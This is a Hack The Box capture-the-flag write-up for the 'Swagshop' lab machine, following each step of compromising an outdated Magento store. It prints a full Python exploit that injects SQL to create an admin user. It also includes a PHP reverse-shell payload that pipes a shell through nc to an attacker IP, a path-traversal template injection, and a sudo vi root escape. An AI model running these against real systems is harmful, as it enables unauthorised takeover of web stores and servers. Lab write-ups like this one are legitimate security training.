Hack The Box - Swagshop

Quick Summary

Hey guys, today Swagshop retired and here’s my write-up about it. It was a very easy box, it had an outdated version of Magento which had a lot of vulnerabilities that allowed me to get command execution. The user could run vi with sudo as root so I used the basic vi/vim escape to get a root shell. It’s a Linux box and its ip is 10.10.10.140 , I added it to /etc/hosts as swagshop.htb . Let’s jump right in !



Nmap

As always we will start with nmap to scan for open ports and services :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

root@kali:~/Desktop/HTB/boxes/swagshop# nmap -sV -sT -sC -o nmapinitial swagshop.htb

Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-27 15:27 EET

Nmap scan report for swagshop.htb (10.10.10.140)

Host is up (0.23s latency).

Not shown: 998 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)

| 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)

|_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

|_http-server-header: Apache/2.4.18 (Ubuntu)

|_http-title: Did not follow redirect to http://10.10.10.140/

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel



Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 64.69 seconds

root@kali:~/Desktop/HTB/boxes/swagshop#



We got http on port 80 and ssh. Let’s check the http service.

Web Enumeration, Creating an admin user

http://swagshop.htb/ :



On port 80 there’s a web application called Magento.

Magento is an open-source e-commerce platform written in PHP. It is one of the most popular open e-commerce systems in the network. This software is created using the Zend Framework. -Wikipedia

By looking at the bottom I saw that the version is from 2014 which is very outdated, so I searched for exploits and this one which creates a new admin user worked, but I had to edit it first.

By browsing the web application I noticed that all paths are after /index.php , for example the login page :



1

http://swagshop.htb/index.php/customer/account/login/



So I set the target to http://swagshop.htb/index.php and I changed the credentials from forme : forme to rick : rick :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

import requests

import base64

import sys



target = "http://swagshop.htb/index.php"



if not target.startswith( "http" ):

target = "http://" + target



if target.endswith( "/" ):

target = target[: -1 ]



target_url = target + "/admin/Cms_Wysiwyg/directive/index/"



q= """

SET @SALT = 'rp';

SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));

SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;

INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());

INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');

"""





query = q.replace( "

" , "" ).format(username= "rick" , password= "rick" )

pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}" .format(query)



r = requests.post(target_url,

data={ "___directive" : "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ" ,

"filter" : base64.b64encode(pfilter),

"forwarded" : 1 })

if r.ok:

print "WORKED"

print "Check {0}/admin with creds rick:rick" .format(target)

else :

print "DID NOT WORK"



1

2

3

root@kali:~/Desktop/HTB/boxes/swagshop# python 37977.py

WORKED

Check http://swagshop.htb/index.php/admin with creds rick:rick







RCE (The Froghopper Attack), User Flag

This machine had several paths for getting RCE but it has been patched several times and now the only method I could use is an attack called froghopper.

As demonstrated in this article I started by allowing symlinks in template settings :

System –> Configuration :



Advanced –> Developer :



Template Settings –> Allow Symlinks :



Then I got a blank png image and echoed a php reverse shell to it :

1

2

3

root@kali:~/Desktop/HTB/boxes/swagshop# echo '<?php' >> shell.php.png

root@kali:~/Desktop/HTB/boxes/swagshop# echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f");' >> shell.php.png

root@kali:~/Desktop/HTB/boxes/swagshop# echo '?>' >> shell.php.png



I uploaded the image as a category thumbnail :

Catalog –> Manage Categories :







Now if we check /media/catalog/category/shell.php.png the image should be there :



Last step is to create the newsletter template and inject the payload :

Newsletter –> Newsletter Templates :







1

block type='core/template' template='../../../../../../media/catalog/category/shell.php.png'



Then I saved the template and clicked on the preview template button :



And I got a shell :



We owned user.

Privilege Escalation, Root Flag

First thing I did after getting a shell was to get a stable tty shell :



I checked sudo and found that www-data can run vi as root on any file in /var/www/html/ :

1

2

3

4

5

6

7

8

www-data@swagshop:/var/www/html$ sudo -l

Matching Defaults entries for www-data on swagshop:

env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin



User www-data may run the following commands on swagshop:

(root) NOPASSWD: /usr/bin/vi /var/www/html/*

www-data@swagshop:/var/www/html$



So I opened index.php in vi as root :

1

www-data@swagshop:/var/www/html$ sudo /usr/bin/vi /var/www/html/index.php



Then I executed /bin/bash from vi :





And we owned root !

That’s it , Feedback is appreciated !

Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham

Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Kryptos

Next Hack The Box write-up : Hack The Box - Ghoul